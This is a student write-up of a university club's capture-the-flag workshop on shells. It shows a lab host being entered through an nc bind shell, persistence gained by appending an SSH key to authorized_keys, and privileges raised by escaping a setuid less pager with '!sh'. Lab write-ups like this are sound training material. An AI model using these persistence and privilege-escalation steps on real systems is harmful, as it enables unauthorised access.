UQ Cyber Squad 0x03 Shells
Mar 29, 2020
by Kush, Nishchal
Introduction
0x03 Shells session presented by the UQ Cyber Squad. Access via OpenVPN connection. OpenVPN configuration bundle provided during the workshop.
Challenge 1 - Family Binding Time - 10pts
Let’s bind together at 192.168.57.11:8297
nc 192.168.57.11 8297
id
uid=1002(user) gid=1002(user) groups=1002(user)
pwd
/home/user
ls -las
total 60
4 drwxr-xr-x 3 user user 4096 Mar 27 06:02 .
4 drwxr-xr-x 4 root root 4096 Mar 24 02:13 ..
4 -rw------- 1 user user 1584 Mar 26 01:26 .bash_history
4 -rw------- 1 user user 105 Mar 26 00:50 .lesshst
4 -rw------- 1 user user 5 Mar 24 03:38 .python_history
4 drwxr-xr-x 2 user user 4096 Mar 26 00:59 .ssh
8 -rw------- 1 user user 5066 Mar 27 06:01 .viminfo
4 -r-xr-xr-x 1 root user 892 Mar 27 06:02 init_shell.py
20 -rwsr-xr-x 1 richard root 16728 Mar 26 00:54 read_secret_message
4 -rw-r--r-- 1 user user 24 Mar 24 02:14 user.txt
cat user.txt
flag{n1c3_b0nd1ng_t1m3}
Challenge 2 - shhhhhhhh - 20pts
How do I ssshhhhh? How do I know how to?
- I actually got to this one last because the hint was very ambiguous, and I just happened to check the ssh daemon configuration sshd_config file.
cat /etc/ssh/sshd_config
# $OpenBSD: sshd_config,v 1.103 2018/04/09 20:41:22 tj Exp $
# This is the sshd server system-wide configuration file. See
# sshd_config(5) for more information.
# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin
# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented. Uncommented options override the
# default value.
#Port 22
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::
#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key
# Ciphers and keying
#RekeyLimit default none
# Logging
#SyslogFacility AUTH
#LogLevel INFO
# Authentication:
#LoginGraceTime 2m
PermitRootLogin yes
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10
# flag{c0nf1gur3d_pr0p3rly}
#PubkeyAuthentication yes
# Expect .ssh/authorized_keys2 to be disregarded by default in future.
#AuthorizedKeysFile .ssh/authorized_keys .ssh/authorized_keys2
#AuthorizedPrincipalsFile none
#AuthorizedKeysCommand none
#AuthorizedKeysCommandUser nobody
# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes
# To disable tunneled clear text passwords, change to no here!
PasswordAuthentication yes
#PermitEmptyPasswords no
# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no
# Kerberos options
#KerberosAuthentication no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
#KerberosGetAFSToken no
# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes
#GSSAPIStrictAcceptorCheck yes
#GSSAPIKeyExchange no
# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication. Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes
#AllowAgentForwarding yes
#AllowTcpForwarding yes
#GatewayPorts no
X11Forwarding yes
#X11DisplayOffset 10
#X11UseLocalhost yes
#PermitTTY yes
PrintMotd no
#PrintLastLog yes
#TCPKeepAlive yes
#PermitUserEnvironment no
#Compression delayed
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS no
#PidFile /var/run/sshd.pid
#MaxStartups 10:30:100
#PermitTunnel no
#ChrootDirectory none
#VersionAddendum none
# no default banner path
#Banner none
# Allow client to pass locale environment variables
AcceptEnv LANG LC_*
# override default of no subsystems
Subsystem sftp /usr/lib/openssh/sftp-server
# Example of overriding settings on a per-user basis
#Match User anoncvs
# X11Forwarding no
# AllowTcpForwarding no
# PermitTTY no
# ForceCommand cvs server
- Submitted:
flag{c0nf1gur3d_pr0p3rly}
Challenge 3 - Mr Richard - 20pts
More is less for Mr Richard
- Generate a local RSA keypair using the ssh_keygen command for the user on the parrot host
- Manually copied the generated public key into the authorised_keys file by copying and pasting into the terminal window
ls -l ./.ssh/
total 4
-rw-r--r-- 1 user user 563 Mar 26 00:59 authorized_keys
cat ./.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDViXPD0mL2mR03VSqXgSv0vOvjaVTudElLEkAOkiKzgicvJoJiJyx/Qu3FbCN5Y5iDhKZT7L7wzEGo178U9QdJbpq3Go+ULQ8cky96ZvU605+7CQmpcqu6xGuoApJz/V3KgTlRcmA8DJLEPMSWYpp8yrTyTkzcu24Z/YrHxoLKkQP/paj1y1/RnewUk/8/N3AoeJTD/RInPXufZX1/Cq+eonyt/lWV3ypZrUGls3KEFSGbSH6dHSypld2CNUNJxz5KmXg8M8bNXIEfLPzluREP9bNULh1gXbcfHqKoI+gKV4ZeodECwb1QSjvKaJffr1LtnHnt+mK6eJEjt7RKRqHc/vzEklt/xOGH+B6/Xjoc2b8K8I2tV9dHIhBqG8CT2NF0E/qqzbCAmwI2fPuZNUApZBx/oASabssONUvzD8vT0tW9HhnfD8MFHVJZWs1hG5pjP4V41Js8OEvqflFiqLsyqiGsZkn0R2HpsLEXIfC+2pjIYkr0RWtMpruwJOKHPPE= kali@kali
netstat -tln
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 192.168.57.11:8297 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp6 0 0 :::80 :::* LISTEN
tcp6 0 0 :::22 :::* LISTEN
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDJnrpgXGIVZnw5zdTZMc5a7bXafaA9GxT2X5ZcO8UBYsSnTHRTl/jcxlHbvghDnNyl51N6McIrCNxjn+SmdxV9zz6LFe2a6pBCGWYGot7sfIXte4LOSXAZZHz0O6GjSR91gJv6sDpo8TTq8/J/VKLzmRA3fIounLunDpOxhRgBa6rG1QXuNm6PBBcYaxL69ygGKR630RmaxKxYvSkHB126AmYi+8hBXvnsDtfg6BX9koIJP3aNyek/7VPrTAn3peV/H7uvWGDZOYoSRCwuMYEFQcyJfI0R382wWCMWaMMyamTTYepyt9tiqGKl5DZzErfhTpyXHzql/Due4I9aRuWo7naJ8AesIw5vdYXvkPwfvEiFRiK1HFde/5+5a7uEJev1q1kL5S77Kjr/Bo3FVRvxfMqsByOlQc7ME60AnKXtxOAzbyFRjXDaTKZcmNMeUoV42ogATxY2RHDHGrvMdRR5qB4AldGwLKFump0ekWUy6Gx/wT/GRnX/4ml1ods7B2s= user@parrot" >> ./.ssh/authorized_keys
cat ./.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDViXPD0mL2mR03VSqXgSv0vOvjaVTudElLEkAOkiKzgicvJoJiJyx/Qu3FbCN5Y5iDhKZT7L7wzEGo178U9QdJbpq3Go+ULQ8cky96ZvU605+7CQmpcqu6xGuoApJz/V3KgTlRcmA8DJLEPMSWYpp8yrTyTkzcu24Z/YrHxoLKkQP/paj1y1/RnewUk/8/N3AoeJTD/RInPXufZX1/Cq+eonyt/lWV3ypZrUGls3KEFSGbSH6dHSypld2CNUNJxz5KmXg8M8bNXIEfLPzluREP9bNULh1gXbcfHqKoI+gKV4ZeodECwb1QSjvKaJffr1LtnHnt+mK6eJEjt7RKRqHc/vzEklt/xOGH+B6/Xjoc2b8K8I2tV9dHIhBqG8CT2NF0E/qqzbCAmwI2fPuZNUApZBx/oASabssONUvzD8vT0tW9HhnfD8MFHVJZWs1hG5pjP4V41Js8OEvqflFiqLsyqiGsZkn0R2HpsLEXIfC+2pjIYkr0RWtMpruwJOKHPPE= kali@kali
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDJnrpgXGIVZnw5zdTZMc5a7bXafaA9GxT2X5ZcO8UBYsSnTHRTl/jcxlHbvghDnNyl51N6McIrCNxjn+SmdxV9zz6LFe2a6pBCGWYGot7sfIXte4LOSXAZZHz0O6GjSR91gJv6sDpo8TTq8/J/VKLzmRA3fIounLunDpOxhRgBa6rG1QXuNm6PBBcYaxL69ygGKR630RmaxKxYvSkHB126AmYi+8hBXvnsDtfg6BX9koIJP3aNyek/7VPrTAn3peV/H7uvWGDZOYoSRCwuMYEFQcyJfI0R382wWCMWaMMyamTTYepyt9tiqGKl5DZzErfhTpyXHzql/Due4I9aRuWo7naJ8AesIw5vdYXvkPwfvEiFRiK1HFde/5+5a7uEJev1q1kL5S77Kjr/Bo3FVRvxfMqsByOlQc7ME60AnKXtxOAzbyFRjXDaTKZcmNMeUoV42ogATxY2RHDHGrvMdRR5qB4AldGwLKFump0ekWUy6Gx/wT/GRnX/4ml1ods7B2s= user@parrot
- Attempted to SSH onto the host using the private key as the
useruser.
ssh -i user_rsa [email protected]
Linux Tom 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Mar 26 00:59:42 2020 from 192.168.57.3
$ id
uid=1002(user) gid=1002(user) groups=1002(user)
$ ls -las
total 60
4 drwxr-xr-x 3 user user 4096 Mar 27 06:02 .
4 drwxr-xr-x 4 root root 4096 Mar 24 02:13 ..
4 -rw------- 1 user user 1584 Mar 26 01:26 .bash_history
4 -r-xr-xr-x 1 root user 892 Mar 27 06:02 init_shell.py
4 -rw------- 1 user user 105 Mar 26 00:50 .lesshst
4 -rw------- 1 user user 5 Mar 24 03:38 .python_history
20 -rwsr-xr-x 1 richard root 16728 Mar 26 00:54 read_secret_message
4 drwxr-xr-x 2 user user 4096 Mar 26 00:59 .ssh
4 -rw-r--r-- 1 user user 24 Mar 24 02:14 user.txt
8 -rw------- 1 user user 5066 Mar 27 06:01 .viminfo
- Ran the read_secret_message command, ran strings on the command and assumed it was running the
lesscommand, resize the terminal window to cause paging in less, then escaped out using!sh. Once out, grabbed the richard flag.
$ ./read_secret_message
$ id
uid=1001(richard) gid=1002(user) groups=1002(user)
$ pwd
/home/user
$ cd ../richard
$ ls -las
total 56
4 drwxr-xr-x 3 richard richard 4096 Mar 26 01:00 .
4 drwxr-xr-x 4 root root 4096 Mar 24 02:13 ..
4 -rw------- 1 richard richard 1233 Mar 26 01:09 .bash_history
4 -rw------- 1 richard richard 34 Mar 24 03:07 .lesshst
4 -rw-r--r-- 1 root root 597 Mar 24 03:05 message.txt
20 -rwsr-xr-x 1 richard root 16728 Mar 26 00:53 read_secret_message
4 -rw-r----- 1 richard richard 210 Mar 26 00:53 read_secret_message.c
4 -rw-r----- 1 richard richard 22 Mar 24 02:45 richard.txt
4 drwxr-xr-x 2 richard user 4096 Mar 26 01:00 .ssh
4 -rw------- 1 richard richard 1662 Mar 24 03:22 .viminfo
$ cat richard.txt
flag{1_4m_mr_r1ch4rd}
Challenge 4 - Too Much T Mux - 20pts
There’s so many!!!
- Listed the tmux sessions using the
tmux lscommand - Manually attached to each session to find the flag using the
tmux a -t session_namecommand - Found the flag in
tmux ls
bluh: 1 windows (created Tue Mar 24 02:47:54 2020) [238x48]
find_me: 1 windows (created Tue Mar 24 02:48:24 2020) [238x48]
goodluck: 1 windows (created Tue Mar 24 02:48:11 2020) [238x48]
hahahahaha: 1 windows (created Tue Mar 24 02:48:02 2020) [238x48]
j: 1 windows (created Tue Mar 24 02:51:36 2020) [238x48]
this_is_evil: 1 windows (created Tue Mar 24 02:48:57 2020) [238x48]
richard@Tom:~$ tmux a -t goodluck
[detached (from session goodluck)]
- Submitted: flag{d3ep_d0wn_und3r}